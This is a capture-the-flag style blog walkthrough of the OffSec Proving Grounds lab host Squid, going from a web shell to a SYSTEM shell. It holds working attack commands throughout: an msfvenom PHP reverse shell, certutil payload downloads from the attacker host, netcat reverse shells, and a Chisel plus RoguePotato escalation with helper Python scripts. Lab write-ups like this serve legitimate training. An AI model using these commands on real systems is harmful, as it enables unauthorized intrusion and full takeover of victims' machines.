
Offensive-S3c: Squid - OffSec PG (Moderate Mode)


<Introduction>

In this blog post, I’ll be walking you through an alternative method to exploit the Squid vulnerable host from the OffSec Proving Grounds. While my previous "Easy Mode" post covered a basic exploitation path, today I’ll explore a more advanced approach to gaining system-level access. If you haven’t already, I recommend reading the Easy Mode blog post first for a comprehensive overview of the initial steps.



<WHATS COVERED>


In this guide I use the same initial-access techniques demonstrated in the Squid Easy Mode post, command injection and remote file inclusion. For privilege escalation I take a deeper dive into two tools: FullPowers, which abuses the Task Scheduler to recover the default privilege set of a service account (most importantly SeImpersonatePrivilege), and Rogue Potato, which then abuses that privilege to impersonate a SYSTEM token. The steps here are somewhat more intricate than the Easy Mode path, so buckle up for a more challenging but rewarding exploit.


If you find this content informative and you are interested in cybersecurity, please regularly check back on Cyb3r-S3c for more updates. For more free content, please like and subscribe to the Cyb3r-0verwatch channel.


 

<OVERVIEW>


As discussed in the Easy Mode post, Squid is a virtual machine designed by Enox and is available in the OffSec Proving Grounds virtual training lab. The host is intentionally vulnerable, with issues such as a misconfigured proxy, identification and authentication failures, broken access control, and various security misconfigurations.



<Exploitation: Prepping the Battlespace>


First, I launched the target host Squid. The OffSec PG console displays the assigned IP address. I followed the steps outlined in the Easy Mode post to gain an initial foothold using a web shell. I highly recommend reading through the Squid Easy Mode post to get up to speed.


msfvenom -p php/reverse_php LHOST=192.168.45.244 LPORT=1234 -f raw > g_reverse.php

Having established a foothold through the 'backdoor.php' web shell, I need to improve my access. With the msfvenom command above I generated a generic PHP reverse shell (raw PHP, no encoding), which I will use to connect back to a Netcat listener on port 1234.


The payload generated successfully. Next I need to get it onto the target host: I will serve it over HTTP from Kali and have the target fetch it.



<Exploitation: Gaining A Foothold>

python -m http.server 8080

On Kali I started a Python HTTP server on port 8080 from the directory holding the payload, as shown above.


nc -lvnp 1234

I also started my Netcat listener on port 1234.


Certutil.exe -urlcache -split -f http://192.168.45.244:8080/g_reverse.php

I executed the Certutil command above through the 'backdoor.php' web shell in the browser. Certutil fetched 'g_reverse.php' from my HTTP server and wrote it into the web shell's working directory, the web root, which is why I can reach it from the browser in the next step. The output confirmed the download succeeded.


To execute the payload I requested 'g_reverse.php' from the target's web server in the browser's address bar and hit enter.



Looking at my Netcat listener, I can see that a session successfully established with the target host.


Running the 'whoami' command revealed that I was operating under the 'LocalService' account.


Certutil.exe -urlcache -split -f http://192.168.45.244:8080/nc.exe

I had improved my access to the underlying operating system, but the PHP reverse shell tended to disconnect periodically, as PHP-based shells often do, so I needed a more stable shell. I uploaded the Windows Netcat binary to the target host through the 'backdoor.php' shell with the Certutil command above.


nc -lvnp 4321

Now that Netcat is on the target host, I started a second Netcat listener on Kali, on port 4321, with the command above.


nc.exe -e cmd.exe 192.168.45.244 4321

With the second listener running, I ran the command above from the PHP reverse shell so that nc.exe spawns 'cmd.exe' and connects it back to Kali.


Looking at my second Netcat listener on port 4321, I can see it caught the connection and shows a Windows command prompt.


Now that I have a more stable shell on the underlying operating system of the target host, I can start the process of privilege escalation.



<Post-Exploitation: Escalating My Privileges>

whoami /priv

Since I covered enumeration in the Easy Mode post, I will skip WinPEAS here and start from what that enumeration already established: the 'whoami /priv' output shows that my 'LocalService' token is missing the privileges that account normally holds. A service can be started with a restricted privilege set, in which case LOCAL SERVICE lacks SeImpersonatePrivilege and the usual Potato-style escalation is not immediately available.


certutil.exe -urlcache -split -f http://192.168.45.214:8080/FullPowers.exe

I uploaded 'FullPowers.exe' to the target host with the Certutil command above, again executed through the web shell.


fullpowers.exe

With FullPowers uploaded, I ran it from my Netcat shell as shown above. It registers a scheduled task that runs as the same service account but with the account's full default privilege set, then spawns a new 'cmd.exe' with that token; the commands that follow run inside that child shell. The output indicated it executed successfully.


whoami /priv

I ran 'whoami /priv' again to verify that FullPowers worked. The 'LocalService' token now carries the account's default privileges, including SeImpersonatePrivilege, which is exactly what the Potato family of tools needs.


On the PayloadsAllTheThings GitHub repository, the Windows - Privilege Escalation page lists the tools that can abuse SeImpersonatePrivilege once it has been restored. From service enumeration I know the target host is Windows Server 2019. JuicyPotato does not work on Server 2019 or Windows 10 1809 and later, because the DCOM activation trick it relies on was fixed, so I will use Rogue Potato, which instead needs a redirector on port 135 of a host I control.
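The decision made in the last few steps (is SeImpersonatePrivilege in the token; if not, is this a service account FullPowers can help; if so, which Potato fits the OS build) is easy to get wrong when reading raw 'whoami /priv' output in a flaky shell. The following Python script is an added example for this walkthrough, not code from the original post or from FullPowers or Rogue Potato. It parses the privilege table and applies that reasoning; the two 'whoami /priv' samples are constructed to mirror the before and after states seen above, not captured output.

```python
"""Triage 'whoami /priv' output from a service-account foothold.

Added example for this walkthrough, not code from the original post or from
FullPowers/RoguePotato. It parses the privilege table and applies the
decision used above: no SeImpersonate/SeAssignPrimaryToken in the token ->
run FullPowers first (LOCAL SERVICE / NETWORK SERVICE only); otherwise pick a
Potato variant by OS build. The two samples are constructed, not captured.
"""

# Constructed: a LOCAL SERVICE token whose service was started with a
# restricted privilege set (what the post sees before FullPowers).
BEFORE_FULLPOWERS = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Constructed: the default LOCAL SERVICE privilege set (what FullPowers restores).
AFTER_FULLPOWERS = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
SERVICE_ACCOUNTS = {"nt authority\\local service", "nt authority\\network service"}
BUILD_1809 = 17763  # Win10 1809 / Server 2019: JuicyPotato's OXID trick no longer works


def parse_whoami_priv(output: str) -> dict:
    """Return {privilege name: 'Enabled' | 'Disabled'} from 'whoami /priv' text."""
    privs = {}
    in_table = False
    for line in output.splitlines():
        if line.startswith("====="):
            in_table = True  # data rows follow the separator line
            continue
        parts = line.split()
        if not in_table or len(parts) < 3:
            continue
        # Do not split on column widths: a description that exactly fills its
        # column leaves a single space before the State column. First and last
        # tokens are all that is needed.
        name, state = parts[0], parts[-1]
        if name.startswith("Se") and state in ("Enabled", "Disabled"):
            privs[name] = state
    return privs


def recommend(privs: dict, account: str, build: int) -> str:
    """Which escalation step to try next. A 'Disabled' impersonation privilege
    still counts: it is in the token, and the Potato tools enable it themselves."""
    if privs.keys() & IMPERSONATION_PRIVS:
        return "RoguePotato/PrintSpoofer" if build >= BUILD_1809 else "JuicyPotato"
    if account.lower() in SERVICE_ACCOUNTS:
        return "FullPowers"  # recover the account's default privilege set first
    return "no impersonation path; keep enumerating"


if __name__ == "__main__":
    account = "nt authority\\local service"
    for label, text in (("before FullPowers", BEFORE_FULLPOWERS), ("after FullPowers", AFTER_FULLPOWERS)):
        privs = parse_whoami_priv(text)
        print(f"{label}: {sorted(privs)} -> {recommend(privs, account, 17763)}")
```

Run it as-is to see the two verdicts ('FullPowers' for the restricted token, 'RoguePotato/PrintSpoofer' for the restored one on build 17763), or paste real 'whoami /priv' output into 'parse_whoami_priv' and pass the build number from 'systeminfo' or 'ver'.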


From the Rogue Potato GitHub repository I downloaded 'RoguePotato.exe', and I also grabbed the Windows 'chisel.exe' binary, which I will use for the port redirect.


Using the 'backdoor.php' shell, I uploaded Rogue Potato and Chisel with the same Certutil technique; the Windows Netcat binary was uploaded earlier in the walkthrough. The output showed all the tools landed on the target host successfully.


With everything in place I changed directory to the web root folder, 'c:\wamp\www', where the uploaded tools live, and began exploiting the target host with Rogue Potato.

echo c:\wamp\www\nc.exe 192.168.45.244 4444  -e cmd > rev.bat

On the target host I created a batch script with the command above. When executed, 'rev.bat' launches Netcat to connect back to Kali on port 4444 and hands it a 'cmd' shell. Rogue Potato will run this script under the impersonated SYSTEM token, so the shell that comes back is a SYSTEM shell.


nc -lvnp 4444

On Kali I started another Netcat listener, on port 4444, to catch the SYSTEM shell.


chisel server -p 8000 --reverse

On Kali I started a Chisel server on port 8000 with '--reverse', which lets connecting clients ask the server to open listening ports on Kali. Because the client will request port 135, the server needs to run as root (or with CAP_NET_BIND_SERVICE) to bind a port below 1024.


chisel.exe client 192.168.45.244:8000 R:135:127.0.0.1:9999

On the target host, using the 'g_reverse.php' shell (the Chisel client keeps that shell busy, so the Netcat shell stays free for Rogue Potato), I ran the Chisel command above. The client connects to Kali on port 8000; the 'R:' remote tells the Chisel server to listen on port 135 on Kali and tunnel anything it receives back through the client to 127.0.0.1:9999 on the target host. Port 9999 is where Rogue Potato's fake OXID resolver will be listening, so the target's DCOM connection to Kali on port 135 ends up on the target's own loopback.


RoguePotato.exe -r 192.168.45.244 -l 9999 -e c:\wamp\www\rev.bat

I ran the command above from the Netcat command prompt on the target host. '-r' is the IP of the redirector, Kali, where the Chisel server is listening on port 135; '-l' is the local port the fake OXID resolver listens on, which must match the port the Chisel remote forwards to; and '-e' is the command to run with the captured token, here 'rev.bat'. As the output shows, Rogue Potato obtained the 'SYSTEM' token and executed the script.
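The three commands above (Chisel server, Chisel client remote, Rogue Potato) have to agree on ports and addresses, and a mismatch fails silently with a Rogue Potato that just times out. The Python script below is an added example for this walkthrough, not code from the original post, from Rogue Potato or from Chisel. It parses the Chisel remote and the Rogue Potato command line and checks that the target's DCOM connection to Kali on port 135 will land on the fake OXID resolver on the target's loopback. It assumes Chisel's remote syntax of '[R:][local-host:]local-port:remote-host:remote-port', where with 'R:' the "local" side is the Chisel server and the "remote" side is the client.

```python
"""Check the Rogue Potato + Chisel redirect chain before running it.

Added example for this walkthrough; not code from the original post, from
Rogue Potato or from Chisel. A mis-wired redirect is the usual reason this
step silently fails, so the check parses the two command lines used above
and confirms that the target's DCOM connection to <Kali>:135 will land on
Rogue Potato's fake OXID resolver on the target's own loopback. Chisel
remote syntax is assumed to be [R:][local-host:]local-port:remote-host:remote-port,
where with 'R:' the "local" side is the Chisel server and "remote" the client.
"""
import shlex

DCOM_PORT = 135  # the port the target's RPCSS contacts for OXID resolution


def parse_chisel_remote(spec: str) -> dict:
    """Decode a Chisel remote such as 'R:135:127.0.0.1:9999'."""
    reverse = spec.startswith("R:")
    fields = (spec[2:] if reverse else spec).split(":")
    if len(fields) == 3:  # local-host omitted: listen on all interfaces
        fields = ["0.0.0.0"] + fields
    if len(fields) != 4:
        raise ValueError(f"unsupported remote spec: {spec}")
    listen_host, listen_port, target_host, target_port = fields
    return {"reverse": reverse, "listen_host": listen_host, "listen_port": int(listen_port),
            "target_host": target_host, "target_port": int(target_port)}


def parse_rogue_potato(cmdline: str) -> dict:
    """Pull -r (redirector IP), -l (fake OXID resolver port) and -e (command) from the command line."""
    args = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    opts = {}
    for i, arg in enumerate(args):
        if arg in ("-r", "-l", "-e") and i + 1 < len(args):
            opts[arg] = args[i + 1]
    return {"redirector": opts.get("-r"),
            "listen_port": int(opts["-l"]) if "-l" in opts else None,
            "command": opts.get("-e")}


def check_wiring(chisel_server_ip: str, chisel_remote: str, rogue_potato_cmd: str) -> list:
    """Return the problems found; an empty list means the chain is consistent."""
    fwd = parse_chisel_remote(chisel_remote)
    rp = parse_rogue_potato(rogue_potato_cmd)
    issues = []
    if not fwd["reverse"]:
        issues.append("chisel remote must use R: so the server (Kali) opens the listening port")
    if fwd["listen_port"] != DCOM_PORT:
        issues.append(f"chisel must listen on {DCOM_PORT}, got {fwd['listen_port']}")
    if fwd["target_host"] not in ("127.0.0.1", "localhost"):
        issues.append("chisel must forward to the target's loopback, where Rogue Potato listens")
    if fwd["target_port"] != rp["listen_port"]:
        issues.append(f"chisel forwards to port {fwd['target_port']} but RoguePotato -l is {rp['listen_port']}")
    if rp["redirector"] != chisel_server_ip:
        issues.append(f"RoguePotato -r {rp['redirector']} must be the chisel server {chisel_server_ip}")
    if not rp["command"]:
        issues.append("RoguePotato -e is missing; nothing would run with the SYSTEM token")
    return issues


if __name__ == "__main__":
    # The exact commands used in this walkthrough (raw string: the Windows path has backslashes).
    problems = check_wiring("192.168.45.244", "R:135:127.0.0.1:9999",
                            r"RoguePotato.exe -r 192.168.45.244 -l 9999 -e c:\wamp\www\rev.bat")
    print("OK" if not problems else "\n".join(problems))
```

The check does not replace the operational prerequisites: the Chisel server still needs '--reverse' and root to bind port 135, and the Netcat listener on the port named in 'rev.bat' must already be up before Rogue Potato runs.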



<Post-Exploitation: I Got Root>

I ran the 'whoami' command in the shell caught on port 4444, and the prompt showed that I had 'System'.


I changed directory to the '\Users\Administrator\Desktop' folder and ran the 'dir' command to display its contents. The output showed the 'proof.txt' file.


I ran the 'type' command to view the contents of the 'proof.txt' file, and the command prompt displayed the 'proof.txt' hash. With that I have completed the Squid vulnerable host.



<CONCLUSION>


To conclude this write-up, using a variety of techniques I was able to go from reconnaissance to SYSTEM (root-equivalent) privileges on the vulnerable host Squid. My initial recon yielded crucial information, and through a systematic approach I gained a foothold on the target host. Further host enumeration uncovered a viable path to escalate my privileges, ultimately capturing the root flag.


If you find this content informative and you are interested in cybersecurity, please regularly check back on the Cyb3r-S3c website. For more free content, please like and subscribe to the Cyb3r-0verwatch channel. Until next time, keep learning; the only way to improve is to keep learning.


/Signing Off,

Pragmat1c_0n3


